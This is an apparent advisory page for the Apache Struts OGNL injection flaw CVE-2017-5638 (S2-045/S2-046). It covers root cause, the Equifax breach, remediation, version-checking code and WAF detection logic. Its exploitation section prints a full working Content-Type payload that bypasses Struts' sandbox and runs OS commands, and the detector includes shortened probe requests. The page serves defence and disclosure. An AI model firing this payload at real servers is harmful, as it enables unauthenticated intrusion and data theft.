CVE-2017-5638 — Apache Struts Remote Code Execution Vulnerability

CVE-2017-5638

Apache Struts — Jakarta Multipart Parser Evaluates Malicious Content-Type Header as OGNL Expression; Equifax Breach; CRITICAL 9.8; Patched March 2017

What Is Apache Struts?

Apache Struts is a widely deployed open-source MVC framework for building Java web applications, used extensively in banking, financial services, government, insurance, and enterprise IT systems. Struts-based applications process HTTP requests and responses; the Jakarta Multipart parser component handles file uploads (multipart/form-data). Because Struts applications frequently handle sensitive business transactions — loan applications, tax filings, financial account management — a Struts RCE gives attackers direct access to the application's data and the ability to pivot to connected databases.

Overview

Actively Exploited. CISA added this vulnerability to its Known Exploited Vulnerabilities (KEV) Catalog on November 3, 2021, as part of the catalog's initial release; federal agencies are required to apply mitigations under BOD 22-01.

CVE-2017-5638 is one of the most consequential vulnerabilities in cybersecurity history: a critical, unauthenticated remote code execution flaw in Apache Struts that attackers used to breach Equifax and steal the personal data of roughly 147 million US consumers. The flaw sits in the Jakarta Multipart parser. When a request whose Content-Type header mentions multipart/form-data fails to parse, Struts builds an error message that embeds the raw header value and then evaluates that message as an OGNL (Object-Graph Navigation Language) expression, so a single crafted HTTP request executes arbitrary Java code on the server with no authentication required. Fixed in Apache Struts 2.3.32 and 2.5.10.1 (advisory S2-045, March 7, 2017). Mass exploitation began within hours of the patch release.

Affected Versions

Apache Struts Version Status
Struts 2.3.5 through 2.3.31 Vulnerable
Struts 2.5 through 2.5.10 Vulnerable
Struts 2.3.32, 2.5.10.1 and later Fixed
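
An added example, not code from the Apache Struts project or from this advisory: a small Python inventory helper that classifies a struts2-core version against the ranges in the table above and locates the bundled struts2-core jar inside a deployed WAR, which is the check the inventory step under Remediation depends on. The sample WAR is constructed in memory with empty placeholder jars; the helper names and the assumption that the framework ships as WEB-INF/lib/struts2-core-<version>.jar are the example's own.

```python
# Added example: classify Struts versions against the S2-045 affected ranges
# (2.3.5 - 2.3.31 and 2.5 - 2.5.10) and locate struts2-core inside a packaged WAR.
# Not code from the Struts project; the sample WAR below is constructed inline.
import io
import re
import zipfile

FIRST_AFFECTED_2_3 = (2, 3, 5)
FIXED_2_3 = (2, 3, 32)
FIXED_2_5 = (2, 5, 10, 1)

# Matches e.g. "WEB-INF/lib/struts2-core-2.3.31.jar" and captures the version.
STRUTS_CORE_RE = re.compile(r"(?:^|/)struts2-core-(\d+(?:\.\d+)+)\.jar$")


def parse_version(text):
    """'2.5.10.1' -> (2, 5, 10, 1). Tuples compare element-wise, so the
    four-part fix version orders correctly: 2.5.10 < 2.5.10.1 < 2.5.12."""
    m = re.search(r"\d+(?:\.\d+)+", text)
    if not m:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(p) for p in m.group(0).split("."))


def is_affected(version):
    """True if the version falls inside an S2-045 vulnerable range."""
    v = parse_version(version)
    if v[:2] == (2, 3):
        return FIRST_AFFECTED_2_3 <= v < FIXED_2_3
    if v[:2] == (2, 5):
        return v < FIXED_2_5
    return False  # other release lines are outside the advisory's ranges


def struts_core_versions(war_bytes):
    """Return every struts2-core version bundled under WEB-INF/lib in a WAR."""
    found = []
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        for name in war.namelist():
            m = STRUTS_CORE_RE.search(name)
            if m:
                found.append(m.group(1))
    return found


def assess_war(war_bytes):
    """[(version, affected?)] for each struts2-core jar found in the WAR."""
    return [(v, is_affected(v)) for v in struts_core_versions(war_bytes)]


def build_sample_war(struts_version):
    """Constructed stand-in for a deployed app: real layout, empty placeholder jars."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as war:
        war.writestr("WEB-INF/web.xml", "<web-app/>")
        war.writestr(f"WEB-INF/lib/struts2-core-{struts_version}.jar", b"")
        war.writestr("WEB-INF/lib/commons-fileupload-1.3.2.jar", b"")
    return buf.getvalue()


if __name__ == "__main__":
    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(ver, assess_war(build_sample_war(ver)))
```

Real deployments also hide struts2-core inside EARs and shaded "uber" jars, where the file name no longer carries the version; for those, read the Implementation-Version from the jar's META-INF/MANIFEST.MF or check for the classes the fix introduced rather than trusting file names.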

Technical Details

Root Cause: OGNL Expression Evaluation of HTTP Header

CVE-2017-5638 is an expression language injection vulnerability (CWE-917) in the Jakarta Multipart parser of Apache Struts 2. OGNL (Object-Graph Navigation Language) is the expression language Struts uses to bind request parameters to action properties and to evaluate dynamic values in validation rules, result configuration and message text; its evaluation is woven deep into request handling.

The specific flaw: Struts routes a request to the multipart parser whenever the Content-Type header contains the string multipart/form-data. If the header is otherwise malformed (no usable boundary, for example), the underlying commons-fileupload parser throws an exception, and the Jakarta parser builds an error message that embeds the raw Content-Type value. That message is passed through Struts' localized-text lookup, which expands %{...} expressions it finds in message text, so the attacker-controlled header is evaluated as OGNL as if it were an application-level expression. The fix in 2.3.32 and 2.5.10.1 keeps the raw header value out of the expression-evaluating message path.

Exploitation:

Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))).(#ros)}

This single HTTP request needs no authentication, no existing session and no knowledge of the target beyond the fact that it runs Struts, and it returns the command's output in the HTTP response. Reading the payload left to right: the leading (#_='multipart/form-data') plants the substring Struts looks for when deciding to invoke the multipart parser while leaving the header unparseable as a real multipart Content-Type, which triggers the error path; the #dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS assignment, the #_memberAccess ternary (covering both older and newer Struts versions) and the calls that clear OgnlUtil's excluded packages and classes replace Struts' restrictive SecurityMemberAccess with OGNL's permissive default, lifting the restrictions that would otherwise stop static calls such as @java.lang.System@getProperty; the remainder picks cmd.exe or /bin/bash from os.name, runs #cmd through ProcessBuilder and reads its output into the expression result. Changing #cmd runs any command the application server's OS user can run.

Attack Characteristics

Attribute Detail
Attack Vector Network — single HTTP POST with malformed Content-Type
Authentication None required
Complexity Low — single crafted HTTP request
Time to PoC after patch Hours (same day as patch release)
Scale Mass automated scanning targeting all public Struts apps

Discovery

Reported to the Apache Struts security team by Nike Zheng of DBAppSecurity, who is credited in the S2-045 advisory. The vulnerability is often misattributed to Man Yue Mo of Semmle (now GitHub Security Lab), who found the separate Struts REST plugin flaw CVE-2017-9805 (S2-052) in September 2017, the same week Equifax disclosed its breach. Apache released the patch on March 7, 2017. Proof-of-concept exploit code was publicly available within hours.

Exploitation Context

  • The Equifax breach: CVE-2017-5638 was used to breach Equifax, the US credit reporting agency, through its online consumer dispute portal starting May 13, 2017, more than two months after the fix was available. The attackers had roughly 76 days of undetected access, until Equifax cut them off on July 30, and exfiltrated names, Social Security numbers, birth dates, addresses and driver's license numbers for about 147 million US consumers, plus credit card numbers for roughly 209,000 of them. The 2019 settlement with the FTC, CFPB and states required Equifax to pay at least $575 million, rising to as much as $700 million.
  • Equifax's failure: Equifax's security team circulated the US-CERT alert internally and instructed administrators to patch, but the vulnerable internet-facing dispute portal was never patched and a follow-up vulnerability scan failed to find it. Separately, a certificate on the SSL/TLS inspection appliance had expired months earlier, so encrypted traffic to the portal was not being inspected; the exfiltration was noticed only after the certificate was renewed.
  • Mass exploitation within hours: public proof-of-concept exploits and scanners appeared within a day of the advisory, and internet-facing Struts applications worldwide were subjected to automated exploitation sweeps immediately afterwards.
  • Ransomware delivery: CVE-2017-5638 has been used for initial access in ransomware campaigns; ransomware operators scan for vulnerable Struts applications to gain a foothold for deployment.
  • Breadth of impact: Apache Struts is deployed across financial services, government, healthcare and insurance, the sectors that process the most sensitive personal and financial data. CVE-2017-5638 is the archetype of a flaw in a widely embedded third-party framework: one fix, thousands of exposed applications, each patched on its own owner's schedule.
  • CISA KEV (2021): added November 3, 2021 as part of the initial KEV catalog release, reflecting both its historical significance and continued exploitation.

Remediation

CISA BOD 22-01 Deadline: May 3, 2022. Apply updates per vendor instructions.
  1. Upgrade Apache Struts: move to 2.3.32 or later on the 2.3 line, or 2.5.10.1 or later on the 2.5 line. Prefer the latest supported release: the 2.3.x line is end of life, later OGNL injection advisories (S2-057, S2-059, S2-061) affect versions that already contain the S2-045 fix, and S2-046 describes a second vector for this same CVE (OGNL in a multipart Content-Disposition filename combined with an oversized Content-Length) that the 2.3.32 and 2.5.10.1 releases also close.

  2. Deploy a WAF rule as an interim mitigation: block requests whose Content-Type header contains OGNL syntax, which is distinctive (%{ or ${ expression wrappers, #name= assignments, @class@member static references, and the sandbox-bypass strings _memberAccess and DEFAULT_MEMBER_ACCESS). Apply the same checks to the Content-Disposition header of each multipart part, because the S2-046 variant of this CVE delivers the expression in the filename rather than in Content-Type. A WAF rule buys time to patch; it does not remove the vulnerable code.

  3. Inventory all Struts deployments — perform a full inventory of applications using Apache Struts; shadow IT and legacy applications are common sources of unpatched Struts instances (as in the Equifax case).

  4. Keep TLS inspection working: at Equifax an expired certificate on the inspection appliance meant exploitation traffic to the dispute portal went uninspected for months, and the breach was noticed only after the certificate was renewed. Monitor inspection devices for expired certificates and for bypass or fail-open conditions, and treat a silent inspection outage as an incident in its own right.

  5. Apply network segmentation for application servers — Struts application servers should not have direct internet egress; outbound connections from application servers to attacker C2 infrastructure are a key post-exploitation indicator and can be blocked by firewall egress controls.

  6. Audit for post-compromise indicators: look for POST requests carrying OGNL syntax in Content-Type or multipart part headers. Ordinary web server access logs rarely record those headers, so use WAF, reverse-proxy or application-server logs that capture them, and treat the multipart parse errors the exploit triggers in application logs as a lead. On the servers themselves, check for unexpected files under the web root, new scheduled tasks or cron entries, and child processes of the application server JVM; a shell spawned by the JVM is a strong sign of exploitation.
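
An added example serving the interim WAF check in step 2 and the log review in step 6, written in Python as detection logic rather than as a rule for any particular WAF product; it is not code from this page or from the Struts project. It parses a raw HTTP request, flags OGNL markers in the Content-Type header (the S2-045 vector) and in the Content-Disposition headers of multipart parts (the S2-046 vector, which shares this CVE), and turns the findings into a block/allow decision. The three sample requests are constructed for the demonstration, and the marker list and function names are the example's own choices.

```python
# Added example: S2-045 / S2-046 request inspection. Not code from the page or
# the Struts project; the sample requests below are constructed, not captured.
import re

# Marker classes that appear in OGNL payloads but not in legitimate header values.
OGNL_MARKERS = {
    "expression_wrapper": re.compile(r"[%$]\{"),                 # %{...} or ${...}
    "sandbox_bypass": re.compile(
        r"_memberAccess|DEFAULT_MEMBER_ACCESS|setMemberAccess|getExcludedPackageNames"),
    "static_access": re.compile(r"@[A-Za-z_][\w.]*@\w+"),        # @java.lang.System@getProperty
    "variable_assignment": re.compile(r"#\w+\s*="),              # #cmd='id'
}

BOUNDARY_RE = re.compile(r'boundary=("?)([^";]+)\1', re.IGNORECASE)


def ognl_indicators(value):
    """Names of the marker classes present in one header value."""
    return [name for name, rx in OGNL_MARKERS.items() if rx.search(value)]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (request line, headers, body).
    Header names are lower-cased; repeated headers are kept as a list."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def multipart_part_headers(body, boundary):
    """Yield the header block of each part in a multipart/form-data body."""
    delimiter = b"--" + boundary.encode("latin-1")
    for part in body.split(delimiter)[1:]:
        if part.strip() == b"--":          # closing delimiter, no part
            continue
        part_head, _, _ = part.partition(b"\r\n\r\n")
        yield part_head.decode("latin-1", "replace")


def inspect_request(raw):
    """Return [(location, [marker names])] for every OGNL-looking header."""
    findings = []
    _, headers, body = parse_request(raw)
    for ct in headers.get("content-type", []):
        hits = ognl_indicators(ct)
        if hits:                            # S2-045: expression in Content-Type itself
            findings.append(("Content-Type", hits))
        m = BOUNDARY_RE.search(ct)
        if m and "multipart/form-data" in ct.lower():
            for part_head in multipart_part_headers(body, m.group(2)):
                hits = ognl_indicators(part_head)
                if hits:                    # S2-046: expression in a part's filename
                    findings.append(("multipart part header", hits))
    return findings


def waf_decision(raw):
    return "BLOCK" if inspect_request(raw) else "ALLOW"


# Constructed sample requests (not captured traffic).
BENIGN_UPLOAD = (
    b"POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    b"Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n\r\n"
    b"------WebKitFormBoundary7MA4YWxk\r\n"
    b'Content-Disposition: form-data; name="file"; filename="report.pdf"\r\n'
    b"Content-Type: application/pdf\r\n\r\n%PDF-1.4 ...\r\n"
    b"------WebKitFormBoundary7MA4YWxk--\r\n"
)

# S2-045 vector: the whole Content-Type value is an OGNL expression (a shortened
# form of the payload shown earlier on this page; no body is needed).
S2_045_PROBE = (
    b"POST /login.action HTTP/1.1\r\nHost: app.example\r\n"
    b"Content-Type: %{(#_='multipart/form-data')."
    b"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#cmd='id')}\r\n"
    b"Content-Length: 0\r\n\r\n"
)

# S2-046 vector: valid multipart Content-Type, OGNL in a part's filename,
# oversized Content-Length.
S2_046_PROBE = (
    b"POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    b"Content-Type: multipart/form-data; boundary=----x\r\n"
    b"Content-Length: 10000000000\r\n\r\n"
    b"------x\r\n"
    b'Content-Disposition: form-data; name="upload"; '
    b"filename=\"%{(#_='multipart/form-data').(#cmd='id')}\x00b\"\r\n"
    b"Content-Type: text/plain\r\n\r\nhello\r\n"
    b"------x--\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_UPLOAD), ("S2-045", S2_045_PROBE),
                       ("S2-046", S2_046_PROBE)):
        print(label, waf_decision(req), inspect_request(req))
```

Run the same function over stored requests from a WAF or reverse-proxy capture to retro-hunt for exploitation attempts. The `${` wrapper and the static-access pattern can match unusual but legitimate filenames, so run a new rule in log-only mode and review hits before switching it to block.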

Key Details

Property: Value
CVE ID: CVE-2017-5638
Vendor / Product: Apache — Struts
NVD Published: 2017-03-11
NVD Last Modified: 2025-10-22
CVSS 3.1 Score: 9.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Severity: CRITICAL
CWE: CWE-917 — Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
CISA KEV Added: 2021-11-03
CISA KEV Deadline: 2022-05-03
Known Ransomware Use: ⚠️ Yes

CVSS 3.1 Breakdown

Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Required Action

CISA BOD 22-01 Deadline: 2022-05-03. Apply updates per vendor instructions.

Timeline

Date: Event
2017-03-07: Apache publishes the S2-045 advisory (reporter: Nike Zheng, DBAppSecurity) and releases Struts 2.3.32 and 2.5.10.1 fixing CVE-2017-5638
2017-03-08: Public proof-of-concept exploits circulate; mass scanning and exploitation of internet-facing Struts applications under way
2017-03-20: Apache publishes S2-046, a second vector for the same CVE via multipart Content-Disposition and Content-Length, closed by the same releases
2017-05-13: Attackers begin exploiting CVE-2017-5638 on Equifax's internet-facing consumer dispute portal
2017-07-29: Equifax detects suspicious traffic and cuts off access the following day; the attackers had had roughly 76 days of access
2017-09-07: Equifax publicly discloses the breach of about 147 million consumers' personal data
2021-11-03: Added to the CISA Known Exploited Vulnerabilities catalog
2022-05-03: CISA BOD 22-01 remediation deadline